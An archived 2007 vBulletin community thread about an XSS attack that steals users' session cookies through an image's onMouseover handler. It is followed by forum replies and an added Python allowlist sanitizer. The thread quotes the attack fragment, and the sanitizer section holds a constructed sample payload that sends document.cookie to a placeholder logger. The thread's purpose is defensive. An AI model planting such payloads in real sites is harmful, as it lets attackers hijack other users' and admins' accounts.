vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   Community Lounge (https://vborg.vbsupport.ru/forumdisplay.php?f=13)
-   -   vBulletin Forums and User Accounts being exploited (https://vborg.vbsupport.ru/showthread.php?t=146395)

GoTTi 05-03-2007 06:27 PM

vBulletin Forums and User Accounts being exploited
 
vbulletin staff please send out a security bulletin regarding this issue.

What is happening:
A user is posting a thread or reply with an image that, on mouseover, records the user's cookie onto a .php file page, which is printing out the data to a .txt file. The data being recorded is the cookie information of the user mousing over the image. When the user does the mouseover on the image, the image will disappear; when that happens, the cookie information is recorded to the external site.

This makes it easy for someone to log in as another user, including admins. All the exploiter has to do is edit their cookie file, save it, and visit the site, and they are logged in as the user. Admins need to be careful....

This has happened to only 2 forums I know of right now, including mine.

After reading the code in the thread that the user posted, it's being done using HTML. Now, we are always told to disable HTML on our forums, but LOTS of people use it because it's a handy tool for users on our forums to play with.

So I guess the only fix, besides disabling the HTML on your forums, is to censor out these keywords that are needed for the recording of the cookie data:

Quote:

onMouseover="document.sam.src=
+document.cookie;">
I believe censoring out these keywords will work and help protect our forums.


Note: I'm not sure if "document.sam.src=" needs to be censored. I think just censoring onMouseover is good enough...
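
Added example, not from the original thread: rather than censoring keywords, a defender can rebuild each post from an allowlist of tags and attributes, so that any event-handler attribute (anything starting with "on") and any non-http(s) URL is dropped before the post is stored. The sample post, the tag/attribute allowlist and the LOGGER placeholder are constructed for this example, modelled on the fragment quoted above.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Allowlist: only these tags survive, and only with these attributes.
ALLOWED = {"b": set(), "i": set(), "u": set(), "br": set(),
           "a": {"href"}, "img": {"src", "alt"}}
SAFE_SCHEMES = {"http", "https"}   # no javascript:, data:, or relative URLs


class PostSanitizer(HTMLParser):
    """Re-emits a post from the allowlist; everything else is dropped and logged."""

    def __init__(self):
        super().__init__()          # convert_charrefs=True: text arrives decoded
        self.out, self.dropped, self.skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1          # also discard the text inside these
        if tag not in ALLOWED:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:   # HTMLParser lower-cases names for us
            value = value or ""
            if name.startswith("on") or name not in ALLOWED[tag]:
                self.dropped.append(f"{tag}@{name}")   # event handlers never pass
            elif name in ("href", "src") and urlsplit(value).scheme.lower() not in SAFE_SCHEMES:
                self.dropped.append(f"{tag}@{name}")   # unsafe or relative URL
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip = max(0, self.skip - 1)   # an unclosed <script> fails closed
        elif tag in ALLOWED and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data))       # re-escape decoded text


def sanitize(post_html):
    """Return (clean_html, dropped_items) for one post body."""
    p = PostSanitizer()
    p.feed(post_html)
    p.close()
    return "".join(p.out), p.dropped


# Constructed sample modelled on the quoted fragment; LOGGER is a placeholder.
SAMPLE = ('<img name="sam" src="http://example.invalid/pic.gif" '
          'onMouseover="document.sam.src=\'LOGGER\'+document.cookie;">')
```

The dropped list is worth writing to a moderation log: a post whose attributes were stripped is a signal worth reviewing, even though the stored copy is already harmless.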

EnIgMa1234 05-03-2007 06:40 PM

Eh, that's why vBulletin asks you not to enable HTML. Simple solution, really.

nexialys 05-03-2007 06:52 PM

Like Enigma just said... most forum software now disables HTML in posts...

So if you've been foolish enough to activate it on a large public website, you now learn your lesson.

Distance 05-03-2007 07:19 PM

Enabling HTML is a foolish thing to do.

GoTTi 05-03-2007 08:03 PM

Where is the option to enable or disable HTML in the AdminCP anyway?

rjmjr69 05-03-2007 08:09 PM

Interesting, 'cause this is also happening with MySpace..........

kall 05-03-2007 10:05 PM

Quote:

Originally Posted by GoTTi (Post 1240828)
Where is the option to enable or disable HTML in the AdminCP anyway?

It's a per-forum setting.

Unless you have installed my modification which makes it a per-usergroup setting.

Anyone who has enabled that for non-admins is a tad on the silly side, IMO.

Ntfu2 05-04-2007 04:00 AM

Quote:

Originally Posted by kall (Post 1240910)

Anyone who has enabled that for non-admins is a tad on the silly side, IMO.

Must have to be nice :D


Personally, I think you're flippin' crazy to have it enabled anywhere.

kall 05-04-2007 04:20 AM

Quote:

Originally Posted by Ntfu2 (Post 1241082)
Must have to be nice :D


Personally, I think you're flippin' crazy to have it enabled anywhere.

Well, true.

There is the odd time where I totally forget, and post dodgy cookie-stealing code on my site. :p



Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
